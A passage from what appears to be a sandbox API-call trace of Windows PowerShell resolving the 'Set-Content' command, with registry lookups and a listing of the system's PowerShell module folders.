lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.604] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.604] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.CPL" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.cpl"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.604] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.604] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.604] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144f4d0 [0168.605] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e35144f4d0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0168.605] CoTaskMemFree (pv=0x1e35144f4d0) [0168.605] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8d358 | out: phkResult=0xb156f8d358*=0x458) returned 0x0 [0168.605] RegQueryValueExW (in: hKey=0x458, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d3a8, lpData=0x0, lpcbData=0xb156f8d3a0*=0x0 | out: lpType=0xb156f8d3a8*=0x1, lpData=0x0, lpcbData=0xb156f8d3a0*=0x56) returned 0x0 [0168.605] RegQueryValueExW (in: hKey=0x458, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8d3a8, lpData=0x1e33948d658, lpcbData=0xb156f8d3a0*=0x56 | out: lpType=0xb156f8d3a8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8d3a0*=0x56) returned 0x0 [0168.605] RegCloseKey (hKey=0x458) returned 0x0 [0168.606] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0168.606] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d450 | out: lpFileInformation=0xb156f8d450*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0168.609] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0168.620] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0168.623] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.623] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0168.623] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0168.624] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0168.624] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0168.624] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0168.624] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0168.624] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0168.625] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0168.625] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0168.625] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0168.625] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0168.625] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0168.625] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0168.626] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0168.626] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0168.626] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0168.626] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0168.626] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0168.626] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0168.627] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0168.627] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0168.627] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0168.627] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0168.628] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0168.628] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0168.628] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0168.628] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0168.628] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0168.629] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0168.629] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0168.629] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0168.629] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0168.629] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0168.629] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0168.630] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, 